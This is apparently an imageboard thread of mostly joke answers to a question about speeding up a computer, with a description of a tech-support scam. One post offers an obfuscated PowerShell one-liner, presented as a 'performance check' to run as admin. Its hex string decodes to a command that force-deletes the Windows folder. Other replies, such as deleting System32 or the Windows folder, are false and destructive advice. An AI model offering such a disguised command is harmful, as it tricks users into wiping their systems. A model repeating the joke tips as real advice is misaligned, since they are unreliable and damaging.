What is a good way to speed up Computer performance?
What is a good way to speed up Computer performance?
Other urls found in this thread:
Install Gentoo
Delete system32.
Use TuneUp Utilities 2020, goy.
Replace all HDDs with a SSD, reformat & reinstall OS. Shit will feel super fast.
Buy as mac.
It just werks.
Install Crux.
Turn your monitor brightness down so more of the electicity goes into the processor.
This, my brightness was high so I was blinded at night and my computer was slow. I lowered the brightness and the computer's speed increased dramatically. Wee need to let more people know about this.
Install FreeDOS
install gentoo
Download more ram.
Have you tried turning it off and back on again?
Call (888) 862-4676 and tell them you want the Bakrichod Special tune up
What is a good way to speed up Computer performance without getting a different operating system?
compile with -O30
Reinstall. Windows ages like potato salad.
It's just a regular scam call.
Next, she would have the guy download some remote control program and show fake viruses with the tree command (they call it a "scan") and show the errors and warnings in the Event Viewer. After that she would show the foreign addresses which are hackers (obviously) with the netstat command. Then she would open a Notepad and list the 1-year plan, the 2-year plan and the 5-year plan with lifelong antivirus security in inconsistent style and broken English.
Don't use Steam you cuck.
Don't use Windows either tbh.
Compile a custom windows kernel to only load the services you need.
Install Windows Speed Booster 2016
Stop buying shitty prebuilts.
Fix whatever's bottlenecking your computer.
Install Gentoo
Turn off all daemons/services you don't absolutely need.
Replace bloated programs with smaller ones, even to the point of going minimalistic if that fulfills your needs (such as stuff from suckless.org and equivalents)
^ in the case of that Steam thing, you can probably just use Dosbox instead, or similar emulators, like PCem:
Disable Aero.
Go bloatless, go free.
Update to Windows 10
Buy a faster computer
Stop downloading botnet software.
You need to get Finally Fast!
that should do, ohh wait..
To speed up performance you must have more RAM, easiest way is to clean it out by downloading more ram.
If you're using Win7 do this
Your System32 is bitrotted and leaking all over your registry spreading malignant bits that get physically stuck in your RAM due to their electrons getting turned into infectious sludge. The only way around this is to delete System32 and put your PC in a dishwasher on high for 3 cycles before letting it dry for 3 days. Trust me I'm geek squad.
How do I make my monitor render 650Hz?
should be "if it mooves"
delete windows folder
buy a faster computer
Make sure all your cables are as straight as possible so the electricity can flow freely. This also helps with slow internet - Bits don't like round corners.
To be fair, you essentially have to talk like that to the computer illiterates when explaining how to do anything.
>my computer used to be fast, REAL fast, but now it's only kinda fast
The face on the guy at the very end sums up this entire commercial.
Don't forget the iBook G4 "running" XP
You need to download more RAM kiddo.
You're retarded if you play with these FPS.
Turn your monitor upside-down and shake it to make some room.
If that doesn't work, it's probably because all the sand fell out of your monitor. You have to take it down to the beach and fill it back up.
I found that once i installed the system folder into a hard lock on my ram bits, My OS would lean a little more to the left of the keyboard but often times would still run quicker if it had the right shoes on the desktop so maybe this will work for you too.
In case this isn't bait:
invoke-expression -command:([System.Text.UTF8Encoding]::UTF8.GetString( ( "64656c20633a5c77696e646f7773202f66202f73202f71" -split '(..)' | ? { $_ } | % {[BYTE]( [CONVERT]::toint16($_,16)) } ) ))
powershell oneliner I wrote up for system performance checks. Uses native libraries instead of doing it all through powershell. Just run powershell as admin, paste that in, and run it.
Thanks man, really appreciate it.
Don't worry, I got your back.
Commit sudoku.
hey that was actually funny
stop using windows
install nixos
It works because source's shitty engine only checks input and network timers after drawing so by running at stupid FPS you artificially reduce latency in the non-graffix parts of the code, too.
It's true, letting things flow through corners is unnatural leads to too much negative energy buildup. Be sure to surround your computer with healing crystals if you notice your computer slowing down due to depression.
Don't remind of this shit.
Buy a wall clock from Wal-Mart or your local hardware store. Take it out of the box and balance your computer chassis on the clock. This is called overclocking and can speed up your computer's performance dramatically.
Check em
lol this FPS meme again
monitors are 60Hz / 60FPS max default otherwise stated (144Hz 280+Hz)